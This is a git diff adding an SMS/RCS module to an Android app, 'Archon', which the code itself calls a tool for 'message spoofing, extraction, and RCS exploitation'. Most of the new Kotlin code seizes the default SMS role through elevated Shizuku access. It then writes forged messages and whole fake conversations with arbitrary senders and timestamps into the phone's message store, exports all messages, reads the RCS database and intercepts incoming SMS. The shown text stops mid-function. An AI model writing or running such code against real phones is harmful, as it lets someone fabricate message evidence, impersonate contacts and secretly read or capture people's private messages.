diff --git a/autarch_companion/app/build.gradle.kts b/autarch_companion/app/build.gradle.kts index 7361f0d..fd1ac86 100644 --- a/autarch_companion/app/build.gradle.kts +++ b/autarch_companion/app/build.gradle.kts @@ -58,4 +58,8 @@ dependencies { // Local ADB client (wireless debugging pairing + shell) implementation("com.github.MuntashirAkon:libadb-android:3.1.1") implementation("org.conscrypt:conscrypt-android:2.5.3") + + // Shizuku for elevated access (SMS/RCS operations) + implementation("dev.rikka.shizuku:api:13.1.5") + implementation("dev.rikka.shizuku:provider:13.1.5") } diff --git a/autarch_companion/app/src/main/AndroidManifest.xml b/autarch_companion/app/src/main/AndroidManifest.xml index be2c7a4..f826fae 100644 --- a/autarch_companion/app/src/main/AndroidManifest.xml +++ b/autarch_companion/app/src/main/AndroidManifest.xml @@ -21,6 +21,7 @@ + @@ -42,6 +43,19 @@ android:theme="@style/Theme.Archon" android:usesCleartextTraffic="true"> + + + + + , + private val onClick: (MessagingRepository.Conversation) -> Unit +) : RecyclerView.Adapter() { + + inner class ViewHolder(itemView: View) : RecyclerView.ViewHolder(itemView) { + val avatarText: TextView = itemView.findViewById(R.id.avatar_text) + val avatarBg: View = itemView.findViewById(R.id.avatar_bg) + val contactName: TextView = itemView.findViewById(R.id.contact_name) + val snippet: TextView = itemView.findViewById(R.id.message_snippet) + val dateText: TextView = itemView.findViewById(R.id.conversation_date) + val unreadBadge: TextView = itemView.findViewById(R.id.unread_badge) + + init { + itemView.setOnClickListener { + val pos = adapterPosition + if (pos != RecyclerView.NO_POSITION) { + onClick(conversations[pos]) + } + } + } + } + + override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): ViewHolder { + val view = LayoutInflater.from(parent.context) + .inflate(R.layout.item_conversation, parent, false) + return ViewHolder(view) + } + + override fun onBindViewHolder(holder: ViewHolder, position: Int) { + val conv = conversations[position] + + // Avatar — first letter of contact name or number + val displayName = conv.contactName ?: conv.address + val initial = displayName.firstOrNull()?.uppercase() ?: "#" + holder.avatarText.text = initial + + // Avatar background color — deterministic based on address + val avatarDrawable = GradientDrawable() + avatarDrawable.shape = GradientDrawable.OVAL + avatarDrawable.setColor(getAvatarColor(conv.address)) + holder.avatarBg.background = avatarDrawable + + // Contact name / phone number + holder.contactName.text = displayName + + // Snippet (most recent message) + holder.snippet.text = conv.snippet + + // Date + holder.dateText.text = formatConversationDate(conv.date) + + // Unread badge + if (conv.unreadCount > 0) { + holder.unreadBadge.visibility = View.VISIBLE + holder.unreadBadge.text = if (conv.unreadCount > 99) "99+" else conv.unreadCount.toString() + } else { + holder.unreadBadge.visibility = View.GONE + } + } + + override fun getItemCount(): Int = conversations.size + + fun updateData(newConversations: List) { + conversations.clear() + conversations.addAll(newConversations) + notifyDataSetChanged() + } + + /** + * Format date for conversation list display. + * Today: show time (3:45 PM), This week: show day (Mon), Older: show date (12/25). + */ + private fun formatConversationDate(timestamp: Long): String { + if (timestamp <= 0) return "" + + val now = System.currentTimeMillis() + val diff = now - timestamp + val date = Date(timestamp) + + val today = Calendar.getInstance() + today.set(Calendar.HOUR_OF_DAY, 0) + today.set(Calendar.MINUTE, 0) + today.set(Calendar.SECOND, 0) + today.set(Calendar.MILLISECOND, 0) + + return when { + timestamp >= today.timeInMillis -> { + // Today — show time + SimpleDateFormat("h:mm a", Locale.US).format(date) + } + diff < TimeUnit.DAYS.toMillis(7) -> { + // This week — show day name + SimpleDateFormat("EEE", Locale.US).format(date) + } + diff < TimeUnit.DAYS.toMillis(365) -> { + // This year — show month/day + SimpleDateFormat("MMM d", Locale.US).format(date) + } + else -> { + // Older — show full date + SimpleDateFormat("M/d/yy", Locale.US).format(date) + } + } + } + + /** + * Generate a deterministic color for a contact's avatar based on their address. + */ + private fun getAvatarColor(address: String): Int { + val colors = intArrayOf( + Color.parseColor("#E91E63"), // Pink + Color.parseColor("#9C27B0"), // Purple + Color.parseColor("#673AB7"), // Deep Purple + Color.parseColor("#3F51B5"), // Indigo + Color.parseColor("#2196F3"), // Blue + Color.parseColor("#009688"), // Teal + Color.parseColor("#4CAF50"), // Green + Color.parseColor("#FF9800"), // Orange + Color.parseColor("#795548"), // Brown + Color.parseColor("#607D8B"), // Blue Grey + ) + val hash = address.hashCode().let { if (it < 0) -it else it } + return colors[hash % colors.size] + } +} + +/** + * RecyclerView adapter for the message thread view. + * Shows messages as chat bubbles — sent aligned right (accent), received aligned left (gray). + */ +class MessageAdapter( + private val messages: MutableList, + private val onLongClick: (MessagingRepository.Message) -> Unit +) : RecyclerView.Adapter() { + + companion object { + private const val VIEW_TYPE_SENT = 0 + private const val VIEW_TYPE_RECEIVED = 1 + } + + inner class ViewHolder(itemView: View) : RecyclerView.ViewHolder(itemView) { + val bubbleBody: TextView = itemView.findViewById(R.id.bubble_body) + val bubbleTime: TextView = itemView.findViewById(R.id.bubble_time) + val bubbleStatus: TextView? = itemView.findViewOrNull(R.id.bubble_status) + val rcsIndicator: TextView? = itemView.findViewOrNull(R.id.rcs_indicator) + + init { + itemView.setOnLongClickListener { + val pos = adapterPosition + if (pos != RecyclerView.NO_POSITION) { + onLongClick(messages[pos]) + } + true + } + } + } + + override fun getItemViewType(position: Int): Int { + val msg = messages[position] + return when (msg.type) { + MessagingRepository.MESSAGE_TYPE_SENT, + MessagingRepository.MESSAGE_TYPE_OUTBOX, + MessagingRepository.MESSAGE_TYPE_QUEUED, + MessagingRepository.MESSAGE_TYPE_FAILED -> VIEW_TYPE_SENT + else -> VIEW_TYPE_RECEIVED + } + } + + override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): ViewHolder { + val layoutRes = if (viewType == VIEW_TYPE_SENT) { + R.layout.item_message_sent + } else { + R.layout.item_message_received + } + val view = LayoutInflater.from(parent.context).inflate(layoutRes, parent, false) + return ViewHolder(view) + } + + override fun onBindViewHolder(holder: ViewHolder, position: Int) { + val msg = messages[position] + + // Message body + holder.bubbleBody.text = msg.body + + // Timestamp + holder.bubbleTime.text = formatMessageTime(msg.date) + + // Delivery status (sent messages only) + holder.bubbleStatus?.let { statusView -> + if (msg.type == MessagingRepository.MESSAGE_TYPE_SENT) { + statusView.visibility = View.VISIBLE + statusView.text = when (msg.status) { + -1 -> "" // No status + 0 -> "Sent" + 32 -> "Delivered" + 64 -> "Failed" + else -> "" + } + } else { + statusView.visibility = View.GONE + } + } + + // RCS indicator + holder.rcsIndicator?.let { indicator -> + if (msg.isRcs) { + indicator.visibility = View.VISIBLE + indicator.text = "RCS" + } else if (msg.isMms) { + indicator.visibility = View.VISIBLE + indicator.text = "MMS" + } else { + indicator.visibility = View.GONE + } + } + } + + override fun getItemCount(): Int = messages.size + + fun updateData(newMessages: List) { + messages.clear() + messages.addAll(newMessages) + notifyDataSetChanged() + } + + fun addMessage(message: MessagingRepository.Message) { + messages.add(message) + notifyItemInserted(messages.size - 1) + } + + /** + * Format timestamp for individual messages. + * Shows time for today, date+time for older messages. + */ + private fun formatMessageTime(timestamp: Long): String { + if (timestamp <= 0) return "" + + val date = Date(timestamp) + val today = Calendar.getInstance() + today.set(Calendar.HOUR_OF_DAY, 0) + today.set(Calendar.MINUTE, 0) + today.set(Calendar.SECOND, 0) + today.set(Calendar.MILLISECOND, 0) + + return if (timestamp >= today.timeInMillis) { + SimpleDateFormat("h:mm a", Locale.US).format(date) + } else { + SimpleDateFormat("MMM d, h:mm a", Locale.US).format(date) + } + } + + /** + * Extension to safely find a view that may not exist in all layout variants. + */ + private fun View.findViewOrNull(id: Int): TextView? { + return try { + findViewById(id) + } catch (e: Exception) { + null + } + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingModule.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingModule.kt new file mode 100644 index 0000000..5cd971b --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingModule.kt @@ -0,0 +1,362 @@ +package com.darkhal.archon.messaging + +import android.content.Context +import android.os.Environment +import android.util.Log +import com.darkhal.archon.module.ArchonModule +import com.darkhal.archon.module.ModuleAction +import com.darkhal.archon.module.ModuleResult +import com.darkhal.archon.module.ModuleStatus +import com.darkhal.archon.util.PrivilegeManager +import java.io.File +import java.text.SimpleDateFormat +import java.util.Date +import java.util.Locale + +/** + * SMS/RCS Tools module — message spoofing, extraction, and RCS exploitation. + * + * Provides actions for: + * - Setting/restoring default SMS app role + * - Exporting all messages or specific threads + * - Forging (inserting fake) messages and conversations + * - Searching message content + * - Checking RCS status and capabilities + * - Shizuku integration status + * - SMS interception toggle + * + * All elevated operations route through ShizukuManager (which itself + * falls back to PrivilegeManager's escalation chain). + */ +class MessagingModule : ArchonModule { + + companion object { + private const val TAG = "MessagingModule" + } + + override val id = "messaging" + override val name = "SMS/RCS Tools" + override val description = "Message spoofing, extraction, and RCS exploitation" + override val version = "1.0" + + override fun getActions(): List = listOf( + ModuleAction( + id = "become_default", + name = "Become Default SMS", + description = "Set Archon as default SMS app (via Shizuku or role request)", + privilegeRequired = true + ), + ModuleAction( + id = "restore_default", + name = "Restore Default SMS", + description = "Restore previous default SMS app", + privilegeRequired = true + ), + ModuleAction( + id = "export_all", + name = "Export All Messages", + description = "Export all SMS/MMS to XML backup file", + privilegeRequired = false + ), + ModuleAction( + id = "export_thread", + name = "Export Thread", + description = "Export specific conversation (use export_thread:)", + privilegeRequired = false + ), + ModuleAction( + id = "forge_message", + name = "Forge Message", + description = "Insert a fake message (use forge_message:
::)", + privilegeRequired = true + ), + ModuleAction( + id = "forge_conversation", + name = "Forge Conversation", + description = "Create entire fake conversation (use forge_conversation:
)", + privilegeRequired = true + ), + ModuleAction( + id = "search_messages", + name = "Search Messages", + description = "Search all messages by keyword (use search_messages:)", + privilegeRequired = false + ), + ModuleAction( + id = "rcs_status", + name = "RCS Status", + description = "Check RCS availability and capabilities", + privilegeRequired = false + ), + ModuleAction( + id = "shizuku_status", + name = "Shizuku Status", + description = "Check Shizuku integration status and privilege level", + privilegeRequired = false + ), + ModuleAction( + id = "intercept_mode", + name = "Intercept Mode", + description = "Toggle SMS interception (intercept_mode:on or intercept_mode:off)", + privilegeRequired = true, + rootOnly = false + ) + ) + + override fun executeAction(actionId: String, context: Context): ModuleResult { + val repo = MessagingRepository(context) + val shizuku = ShizukuManager(context) + + return when { + actionId == "become_default" -> becomeDefault(shizuku) + actionId == "restore_default" -> restoreDefault(shizuku) + actionId == "export_all" -> exportAll(context, repo) + actionId == "export_thread" -> ModuleResult(false, "Specify thread: export_thread:") + actionId.startsWith("export_thread:") -> { + val threadId = actionId.substringAfter(":").toLongOrNull() + ?: return ModuleResult(false, "Invalid thread ID") + exportThread(context, repo, threadId) + } + actionId == "forge_message" -> ModuleResult(false, "Usage: forge_message:
::") + actionId.startsWith("forge_message:") -> { + val params = actionId.removePrefix("forge_message:").split(":", limit = 3) + if (params.size < 3) return ModuleResult(false, "Usage: forge_message:
::") + val type = params[2].toIntOrNull() ?: 1 + forgeMessage(repo, params[0], params[1], type) + } + actionId == "forge_conversation" -> ModuleResult(false, "Specify address: forge_conversation:") + actionId.startsWith("forge_conversation:") -> { + val address = actionId.substringAfter(":") + forgeConversation(repo, address) + } + actionId == "search_messages" -> ModuleResult(false, "Specify query: search_messages:") + actionId.startsWith("search_messages:") -> { + val query = actionId.substringAfter(":") + searchMessages(repo, query) + } + actionId == "rcs_status" -> rcsStatus(context, repo, shizuku) + actionId == "shizuku_status" -> shizukuStatus(shizuku) + actionId == "intercept_mode" -> ModuleResult(false, "Specify: intercept_mode:on or intercept_mode:off") + actionId == "intercept_mode:on" -> interceptMode(shizuku, true) + actionId == "intercept_mode:off" -> interceptMode(shizuku, false) + else -> ModuleResult(false, "Unknown action: $actionId") + } + } + + override fun getStatus(context: Context): ModuleStatus { + val shizuku = ShizukuManager(context) + val shizukuReady = shizuku.isReady() + val privilegeReady = PrivilegeManager.isReady() + + val summary = when { + shizukuReady -> "Ready (elevated access)" + privilegeReady -> "Ready (basic access)" + else -> "No privilege access — run Setup" + } + + return ModuleStatus( + active = shizukuReady || privilegeReady, + summary = summary, + details = mapOf( + "shizuku" to shizuku.getStatus().label, + "privilege" to PrivilegeManager.getAvailableMethod().label + ) + ) + } + + // ── Action implementations ───────────────────────────────────── + + private fun becomeDefault(shizuku: ShizukuManager): ModuleResult { + if (!shizuku.isReady()) { + return ModuleResult(false, "Elevated access required — start Archon Server or Shizuku first") + } + + val success = shizuku.setDefaultSmsApp() + return if (success) { + ModuleResult(true, "Archon is now the default SMS app — can write to SMS database", + listOf("Previous default saved for restoration", + "Use 'Restore Default' when done")) + } else { + ModuleResult(false, "Failed to set default SMS app — check Shizuku/ADB permissions") + } + } + + private fun restoreDefault(shizuku: ShizukuManager): ModuleResult { + val success = shizuku.revokeDefaultSmsApp() + return if (success) { + ModuleResult(true, "Default SMS app restored") + } else { + ModuleResult(false, "Failed to restore default SMS app") + } + } + + private fun exportAll(context: Context, repo: MessagingRepository): ModuleResult { + return try { + val xml = repo.exportAllMessages("xml") + if (xml.isBlank()) { + return ModuleResult(false, "No messages to export (check SMS permission)") + } + + // Write to file + val timestamp = SimpleDateFormat("yyyyMMdd_HHmmss", Locale.US).format(Date()) + val exportDir = File(context.getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS), "sms_export") + exportDir.mkdirs() + val file = File(exportDir, "sms_backup_$timestamp.xml") + file.writeText(xml) + + val lineCount = xml.lines().size + ModuleResult(true, "Exported $lineCount lines to ${file.absolutePath}", + listOf("Format: SMS Backup & Restore compatible XML", + "Path: ${file.absolutePath}", + "Size: ${file.length() / 1024}KB")) + } catch (e: Exception) { + Log.e(TAG, "Export failed", e) + ModuleResult(false, "Export failed: ${e.message}") + } + } + + private fun exportThread(context: Context, repo: MessagingRepository, threadId: Long): ModuleResult { + return try { + val xml = repo.exportConversation(threadId, "xml") + if (xml.isBlank()) { + return ModuleResult(false, "No messages in thread $threadId or no permission") + } + + val timestamp = SimpleDateFormat("yyyyMMdd_HHmmss", Locale.US).format(Date()) + val exportDir = File(context.getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS), "sms_export") + exportDir.mkdirs() + val file = File(exportDir, "thread_${threadId}_$timestamp.xml") + file.writeText(xml) + + ModuleResult(true, "Exported thread $threadId to ${file.name}", + listOf("Path: ${file.absolutePath}", "Size: ${file.length() / 1024}KB")) + } catch (e: Exception) { + ModuleResult(false, "Thread export failed: ${e.message}") + } + } + + private fun forgeMessage(repo: MessagingRepository, address: String, body: String, type: Int): ModuleResult { + val id = repo.forgeMessage( + address = address, + body = body, + type = type, + date = System.currentTimeMillis(), + read = true + ) + + return if (id >= 0) { + val direction = if (type == 1) "received" else "sent" + ModuleResult(true, "Forged $direction message id=$id", + listOf("Address: $address", "Body: ${body.take(50)}", "Type: $direction")) + } else { + ModuleResult(false, "Forge failed — is Archon the default SMS app? Use 'Become Default' first") + } + } + + private fun forgeConversation(repo: MessagingRepository, address: String): ModuleResult { + // Create a sample conversation with back-and-forth messages + val messages = listOf( + "Hey, are you there?" to MessagingRepository.MESSAGE_TYPE_RECEIVED, + "Yeah, what's up?" to MessagingRepository.MESSAGE_TYPE_SENT, + "Can you meet me later?" to MessagingRepository.MESSAGE_TYPE_RECEIVED, + "Sure, what time?" to MessagingRepository.MESSAGE_TYPE_SENT, + "Around 7pm at the usual place" to MessagingRepository.MESSAGE_TYPE_RECEIVED, + "Sounds good, see you then" to MessagingRepository.MESSAGE_TYPE_SENT, + ) + + val threadId = repo.forgeConversation(address, messages) + return if (threadId >= 0) { + ModuleResult(true, "Forged conversation thread=$threadId with ${messages.size} messages", + listOf("Address: $address", "Messages: ${messages.size}", "Thread ID: $threadId")) + } else { + ModuleResult(false, "Forge conversation failed — is Archon the default SMS app?") + } + } + + private fun searchMessages(repo: MessagingRepository, query: String): ModuleResult { + val results = repo.searchMessages(query) + if (results.isEmpty()) { + return ModuleResult(true, "No messages matching '$query'") + } + + val details = results.take(20).map { msg -> + val direction = if (msg.type == 1) "recv" else "sent" + val dateStr = SimpleDateFormat("MM/dd HH:mm", Locale.US).format(Date(msg.date)) + "[$direction] ${msg.address} ($dateStr): ${msg.body.take(60)}" + } + + val extra = if (results.size > 20) { + listOf("... and ${results.size - 20} more results") + } else { + emptyList() + } + + return ModuleResult(true, "${results.size} message(s) matching '$query'", + details + extra) + } + + private fun rcsStatus(context: Context, repo: MessagingRepository, shizuku: ShizukuManager): ModuleResult { + val details = mutableListOf() + + // Check RCS availability + val rcsAvailable = repo.isRcsAvailable() + details.add("RCS available: $rcsAvailable") + + if (rcsAvailable) { + details.add("Provider: Google Messages") + } else { + details.add("RCS not detected — Google Messages may not be installed or RCS not enabled") + } + + // Check if we can access RCS provider + if (shizuku.isReady()) { + val canAccess = shizuku.accessRcsProvider() + details.add("RCS provider access: $canAccess") + + if (canAccess) { + val rcsMessages = shizuku.readRcsDatabase() + details.add("RCS messages readable: ${rcsMessages.size}") + } + } else { + details.add("Elevated access needed for full RCS access") + } + + return ModuleResult(true, + if (rcsAvailable) "RCS available" else "RCS not detected", + details) + } + + private fun shizukuStatus(shizuku: ShizukuManager): ModuleResult { + val status = shizuku.getStatus() + val privilegeMethod = PrivilegeManager.getAvailableMethod() + + val details = listOf( + "Shizuku status: ${status.label}", + "Privilege method: ${privilegeMethod.label}", + "Elevated ready: ${shizuku.isReady()}", + "Can write SMS DB: ${status == ShizukuManager.ShizukuStatus.READY}", + "Can access RCS: ${status == ShizukuManager.ShizukuStatus.READY}" + ) + + return ModuleResult(true, status.label, details) + } + + private fun interceptMode(shizuku: ShizukuManager, enable: Boolean): ModuleResult { + if (!shizuku.isReady()) { + return ModuleResult(false, "Elevated access required for interception") + } + + val success = shizuku.interceptSms(enable) + return if (success) { + val state = if (enable) "ENABLED" else "DISABLED" + ModuleResult(true, "SMS interception $state", + listOf(if (enable) { + "Archon is now the default SMS handler — all incoming messages will be captured" + } else { + "Previous SMS handler restored" + })) + } else { + ModuleResult(false, "Failed to ${if (enable) "enable" else "disable"} interception") + } + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingRepository.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingRepository.kt new file mode 100644 index 0000000..0f48e95 --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingRepository.kt @@ -0,0 +1,940 @@ +package com.darkhal.archon.messaging + +import android.content.ContentValues +import android.content.Context +import android.database.Cursor +import android.net.Uri +import android.provider.ContactsContract +import android.provider.Telephony +import android.telephony.SmsManager +import android.util.Log +import java.text.SimpleDateFormat +import java.util.Date +import java.util.Locale + +/** + * Data access layer for SMS/MMS/RCS messages using Android ContentResolver. + * + * Most write operations require the app to be the default SMS handler. + * Use ShizukuManager or RoleManager to acquire that role first. + */ +class MessagingRepository(private val context: Context) { + + companion object { + private const val TAG = "MessagingRepo" + + // SMS message types + const val MESSAGE_TYPE_RECEIVED = 1 + const val MESSAGE_TYPE_SENT = 2 + const val MESSAGE_TYPE_DRAFT = 3 + const val MESSAGE_TYPE_OUTBOX = 4 + const val MESSAGE_TYPE_FAILED = 5 + const val MESSAGE_TYPE_QUEUED = 6 + + // Content URIs + val URI_SMS: Uri = Uri.parse("content://sms/") + val URI_MMS: Uri = Uri.parse("content://mms/") + val URI_SMS_CONVERSATIONS: Uri = Uri.parse("content://sms/conversations/") + val URI_MMS_SMS_CONVERSATIONS: Uri = Uri.parse("content://mms-sms/conversations/") + val URI_MMS_SMS_COMPLETE: Uri = Uri.parse("content://mms-sms/complete-conversations/") + + // RCS content provider (Google Messages) + val URI_RCS_MESSAGES: Uri = Uri.parse("content://im/messages") + val URI_RCS_THREADS: Uri = Uri.parse("content://im/threads") + } + + // ── Data classes ─────────────────────────────────────────────── + + data class Conversation( + val threadId: Long, + val address: String, + val snippet: String, + val date: Long, + val messageCount: Int, + val unreadCount: Int, + val contactName: String? + ) + + data class Message( + val id: Long, + val threadId: Long, + val address: String, + val body: String, + val date: Long, + val type: Int, + val read: Boolean, + val status: Int, + val isRcs: Boolean, + val isMms: Boolean, + val contactName: String? + ) + + // ── Read operations ──────────────────────────────────────────── + + /** + * Get all conversations from the combined SMS+MMS threads provider. + * Falls back to SMS-only conversations if the combined provider is not available. + */ + fun getConversations(): List { + val conversations = mutableListOf() + val threadMap = mutableMapOf() + + try { + // Query all SMS messages grouped by thread_id + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "read", "type"), + null, null, "date DESC" + ) + + cursor?.use { + while (it.moveToNext()) { + val threadId = it.getLongSafe("thread_id") + if (threadId <= 0) continue + + val existing = threadMap[threadId] + if (existing != null) { + // Update counts + val unread = if (!it.getBoolSafe("read")) 1 else 0 + threadMap[threadId] = existing.copy( + messageCount = existing.messageCount + 1, + unreadCount = existing.unreadCount + unread + ) + } else { + val address = it.getStringSafe("address") + val read = it.getBoolSafe("read") + threadMap[threadId] = Conversation( + threadId = threadId, + address = address, + snippet = it.getStringSafe("body"), + date = it.getLongSafe("date"), + messageCount = 1, + unreadCount = if (!read) 1 else 0, + contactName = getContactName(address) + ) + } + } + } + + conversations.addAll(threadMap.values) + conversations.sortByDescending { it.date } + + } catch (e: SecurityException) { + Log.e(TAG, "No SMS read permission", e) + } catch (e: Exception) { + Log.e(TAG, "Failed to get conversations", e) + } + + return conversations + } + + /** + * Get all messages in a specific thread, ordered by date ascending (oldest first). + */ + fun getMessages(threadId: Long): List { + val messages = mutableListOf() + + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + "thread_id = ?", + arrayOf(threadId.toString()), + "date ASC" + ) + + cursor?.use { + while (it.moveToNext()) { + val address = it.getStringSafe("address") + messages.add(Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + )) + } + } + + // Also try to load MMS messages for this thread + loadMmsForThread(threadId, messages) + + // Sort combined list by date + messages.sortBy { it.date } + + } catch (e: SecurityException) { + Log.e(TAG, "No SMS read permission", e) + } catch (e: Exception) { + Log.e(TAG, "Failed to get messages for thread $threadId", e) + } + + return messages + } + + /** + * Get a single message by ID. + */ + fun getMessage(id: Long): Message? { + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + "_id = ?", + arrayOf(id.toString()), + null + ) + + cursor?.use { + if (it.moveToFirst()) { + val address = it.getStringSafe("address") + return Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + ) + } + } + } catch (e: Exception) { + Log.e(TAG, "Failed to get message $id", e) + } + return null + } + + /** + * Full-text search across all SMS message bodies. + */ + fun searchMessages(query: String): List { + val messages = mutableListOf() + if (query.isBlank()) return messages + + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + "body LIKE ?", + arrayOf("%$query%"), + "date DESC" + ) + + cursor?.use { + while (it.moveToNext()) { + val address = it.getStringSafe("address") + messages.add(Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + )) + } + } + } catch (e: Exception) { + Log.e(TAG, "Search failed for '$query'", e) + } + + return messages + } + + /** + * Lookup contact display name by phone number. + */ + fun getContactName(address: String): String? { + if (address.isBlank()) return null + + try { + val uri = Uri.withAppendedPath( + ContactsContract.PhoneLookup.CONTENT_FILTER_URI, + Uri.encode(address) + ) + val cursor = context.contentResolver.query( + uri, + arrayOf(ContactsContract.PhoneLookup.DISPLAY_NAME), + null, null, null + ) + + cursor?.use { + if (it.moveToFirst()) { + val idx = it.getColumnIndex(ContactsContract.PhoneLookup.DISPLAY_NAME) + if (idx >= 0) return it.getString(idx) + } + } + } catch (e: Exception) { + // Contact lookup can fail for short codes, etc. + Log.d(TAG, "Contact lookup failed for $address: ${e.message}") + } + return null + } + + // ── Write operations (requires default SMS app role) ────────── + + /** + * Send an SMS message via SmsManager. + * Returns true if the message was submitted to the system for sending. + */ + fun sendSms(address: String, body: String): Boolean { + return try { + val smsManager = context.getSystemService(SmsManager::class.java) + if (body.length > 160) { + val parts = smsManager.divideMessage(body) + smsManager.sendMultipartTextMessage(address, null, parts, null, null) + } else { + smsManager.sendTextMessage(address, null, body, null, null) + } + // Also insert into sent box + insertSms(address, body, MESSAGE_TYPE_SENT, System.currentTimeMillis(), true) + true + } catch (e: Exception) { + Log.e(TAG, "Failed to send SMS to $address", e) + false + } + } + + /** + * Insert an SMS record into the content provider. + * Requires default SMS app role for writing. + * + * @param type 1=received, 2=sent, 3=draft, 4=outbox, 5=failed, 6=queued + * @return the row ID of the inserted message, or -1 on failure + */ + fun insertSms(address: String, body: String, type: Int, date: Long, read: Boolean): Long { + return try { + val values = ContentValues().apply { + put("address", address) + put("body", body) + put("type", type) + put("date", date) + put("read", if (read) 1 else 0) + put("seen", 1) + } + + val uri = context.contentResolver.insert(URI_SMS, values) + if (uri != null) { + val id = uri.lastPathSegment?.toLongOrNull() ?: -1L + Log.i(TAG, "Inserted SMS id=$id type=$type addr=$address") + id + } else { + Log.w(TAG, "SMS insert returned null URI — app may not be default SMS handler") + -1L + } + } catch (e: SecurityException) { + Log.e(TAG, "No write permission — must be default SMS app", e) + -1L + } catch (e: Exception) { + Log.e(TAG, "Failed to insert SMS", e) + -1L + } + } + + /** + * Update an existing SMS message's fields. + */ + fun updateMessage(id: Long, body: String?, type: Int?, date: Long?, read: Boolean?): Boolean { + return try { + val values = ContentValues() + body?.let { values.put("body", it) } + type?.let { values.put("type", it) } + date?.let { values.put("date", it) } + read?.let { values.put("read", if (it) 1 else 0) } + + if (values.size() == 0) return false + + val count = context.contentResolver.update( + Uri.parse("content://sms/$id"), + values, null, null + ) + Log.i(TAG, "Updated SMS id=$id, rows=$count") + count > 0 + } catch (e: SecurityException) { + Log.e(TAG, "No write permission for update", e) + false + } catch (e: Exception) { + Log.e(TAG, "Failed to update message $id", e) + false + } + } + + /** + * Delete a single SMS message by ID. + */ + fun deleteMessage(id: Long): Boolean { + return try { + val count = context.contentResolver.delete( + Uri.parse("content://sms/$id"), null, null + ) + Log.i(TAG, "Deleted SMS id=$id, rows=$count") + count > 0 + } catch (e: Exception) { + Log.e(TAG, "Failed to delete message $id", e) + false + } + } + + /** + * Delete all messages in a conversation thread. + */ + fun deleteConversation(threadId: Long): Boolean { + return try { + val count = context.contentResolver.delete( + URI_SMS, "thread_id = ?", arrayOf(threadId.toString()) + ) + Log.i(TAG, "Deleted conversation thread=$threadId, rows=$count") + count > 0 + } catch (e: Exception) { + Log.e(TAG, "Failed to delete conversation $threadId", e) + false + } + } + + /** + * Mark all messages in a thread as read. + */ + fun markAsRead(threadId: Long): Boolean { + return try { + val values = ContentValues().apply { + put("read", 1) + put("seen", 1) + } + val count = context.contentResolver.update( + URI_SMS, values, + "thread_id = ? AND read = 0", + arrayOf(threadId.toString()) + ) + Log.i(TAG, "Marked $count messages as read in thread $threadId") + count >= 0 + } catch (e: Exception) { + Log.e(TAG, "Failed to mark thread $threadId as read", e) + false + } + } + + // ── Spoofing / Forging ───────────────────────────────────────── + + /** + * Insert a forged message with arbitrary sender, body, timestamp, and direction. + * This creates a message that appears to come from the given address + * at the given time, regardless of whether it was actually received. + * + * Requires default SMS app role. + * + * @param type MESSAGE_TYPE_RECEIVED (1) to fake incoming, MESSAGE_TYPE_SENT (2) to fake outgoing + * @return the row ID of the forged message, or -1 on failure + */ + fun forgeMessage( + address: String, + body: String, + type: Int, + date: Long, + contactName: String? = null, + read: Boolean = true + ): Long { + return try { + val values = ContentValues().apply { + put("address", address) + put("body", body) + put("type", type) + put("date", date) + put("read", if (read) 1 else 0) + put("seen", 1) + // Set status to complete for sent messages + if (type == MESSAGE_TYPE_SENT) { + put("status", Telephony.Sms.STATUS_COMPLETE) + } + // person field links to contacts — we leave it null for forged messages + // unless we want to explicitly associate with a contact + contactName?.let { put("person", 0) } + } + + val uri = context.contentResolver.insert(URI_SMS, values) + if (uri != null) { + val id = uri.lastPathSegment?.toLongOrNull() ?: -1L + Log.i(TAG, "Forged SMS id=$id type=$type addr=$address date=$date") + id + } else { + Log.w(TAG, "Forge insert returned null — not default SMS app?") + -1L + } + } catch (e: SecurityException) { + Log.e(TAG, "Forge failed — no write permission", e) + -1L + } catch (e: Exception) { + Log.e(TAG, "Forge failed", e) + -1L + } + } + + /** + * Create an entire fake conversation by inserting multiple messages. + * + * @param messages list of (body, type) pairs where type is 1=received, 2=sent + * @return the thread ID of the created conversation, or -1 on failure + */ + fun forgeConversation(address: String, messages: List>): Long { + if (messages.isEmpty()) return -1L + + // Insert messages with increasing timestamps, 1-5 minutes apart + var timestamp = System.currentTimeMillis() - (messages.size * 180_000L) // Start N*3min ago + var threadId = -1L + + for ((body, type) in messages) { + val id = forgeMessage(address, body, type, timestamp, read = true) + if (id < 0) { + Log.e(TAG, "Failed to forge message in conversation") + return -1L + } + + // Get the thread ID from the first inserted message + if (threadId < 0) { + val msg = getMessage(id) + threadId = msg?.threadId ?: -1L + } + + // Advance 